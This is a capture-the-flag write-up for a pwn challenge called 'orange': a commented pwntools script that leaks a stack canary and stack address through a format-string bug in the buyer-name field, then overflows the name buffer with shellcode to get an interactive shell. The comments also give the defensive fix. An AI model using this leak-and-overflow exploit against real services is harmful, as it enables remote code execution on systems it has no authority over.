Points: 350

Tags: pwn 


Just code:

# pwntools solve script for the "orange" challenge (CTF writeup, code only).
#
# What the visible code does, in order:
#   1. Leaks the stack canary by sending a '%17$p' format specifier as the
#      buyer name and reading it back from the "Buyer:" line of the cart.
#   2. Leaks a stack address the same way with '%7$p' and adds 0x10 to it.
#   3. Sends a final name of shellcode + padding + leaked canary + RET + stack
#      address, then drops to an interactive session.
#
# Defensive reading of the same steps: both leaks only work because the buyer
# name is used as a printf-style format string, and the final write only works
# because the name buffer is copied without a length bound.  A constant format
# string ("%s") plus a bounded copy removes the leak, and without the leaked
# canary the overflow would be caught by the canary check.  The offsets
# (17, 7, 104, 0x10) are specific to this binary and are not explained on the
# page.
from pwn import *             #include
context.log_level='info'      # 'info' is enough to start with
#context.log_level='debug'     # 'debug' prints exactly what is sent/received
#-
context.update(arch='x86_64', os='linux') # remember this when arch/os are not taken from the binary
context.terminal = ['wt.exe','wsl.exe'] # terminal used by gdb.attach under WSL

# Target binary; context.binary also sets arch/os for asm()/shellcraft below.
binary = context.binary = ELF("./orange", checksec=False)


# Three launch modes selected via pwntools command-line args:
#   GDB    -> local process, debugger attached right after start
#   REMOTE -> network connection to the challenge server
#   (none) -> plain local process
if args.GDB:
    gdbscript = """
    call puts("Hello from process debugger!")
    b *0x0000000000401196
    """
    p = process(binary.path)
elif args.REMOTE:
    address='orange.uctf.ir'
    port='5001'    
    p=remote(address,port) # remote connection to the challenge server
else:
    p = process(binary.path)
    

# NOTE: in GDB mode the script goes interactive here and the automated
# exchange below only runs once interactive() returns (presumably on EOF).
if args.GDB:    
    gdb.attach(p,gdbscript)
    pause (3)                # press 'c' in the debugger once it is attached
    #p.sendline(payload)
    p.interactive()

# Address placed after the canary in the final payload; named RET by the
# author (presumably a single `ret` gadget — not verifiable from this page).
RET=0x000000000040101a

# --- Step 1: leak the canary via the buyer name ---------------------------
# '%17$p' is echoed back by the binary when the cart is shown, which is the
# format-string leak described above.
CANARYp=b'%17$p'
p.sendlineafter(b'Enter your name:',CANARYp)
info(f"Enter your name: {CANARYp}")
p.sendlineafter(b'Enter your choice:',b'3')
info(f"3. Buy Oranges->3")
p.sendlineafter(b'to buy:',b'1')
info(f"Enter the number of oranges you want to buy ->1")
p.sendlineafter(b'Enter your choice:',b'1')
info(f"1. Show Cart->1")
p.recvuntil(b"Buyer: ")
CANARY=p.recvline().strip()
info (f"CANARY: {CANARY}")    
# The leaked value is printed as hex text (e.g. 0x...); parse it to an int.
CANARY=int(CANARY,16)

# Menu option 5 lets the name be set again, so the leak can be repeated.
p.sendlineafter(b'5. Change Buyer Name',b'5')
info(f"5. Change Buyer Name->5")

# --- Step 2: leak a stack address the same way ----------------------------
STACKp=b'%7$p'
p.sendlineafter(b'Enter your name:',STACKp)
info(f"Enter your name: {STACKp}")

p.sendlineafter(b'Enter your choice:',b'1')
info(f"1. Show Cart->1")
p.recvuntil(b"Buyer: ")
STACK=p.recvline().strip()
# +0x10 adjusts the leaked pointer to where the author wants it to land;
# the reason for exactly 0x10 is not given on the page.
STACK=int(STACK,16)+0x10 #ok

info (f"STACK: {hex(STACK)}")    

p.sendlineafter(b'Enter your choice:',b'1')
info(f"1. Show Cart->1")

# Alternative gdb script kept by the author for debugging the final write
# (the lines inside the string are gdb commands, not Python comments).
gdbscript = """
#call puts("Hello from process debugger!")
#start
#b *main
#SET_BUYER_NAME
b *0x0000000000401720
"""
#gdb.attach(p,gdbscript)
#pause (5)                # press 'c' in the debugger once it is attached

p.sendlineafter(b'5. Change Buyer Name',b'5')

info(f"5. Change Buyer Name->5")


# --- Step 3: final name write -----------------------------------------------
# shellcraft.sh() with the x86_64 context set above.
SHELLCODE= asm(shellcraft.sh())


# Layout: shellcode, 'B' padding up to 104 bytes, the leaked canary (so the
# canary check passes), RET, then the adjusted stack address.  The 104-byte
# buffer size is taken from the author; it is not derivable from this page.
payload=SHELLCODE+b'B'*(104-len(SHELLCODE))+p64(CANARY)+p64(RET)+p64(STACK)
pause (1)
p.sendlineafter(b'Enter your name:',payload)
p.interactive()

by Kerszi/MindCrafters
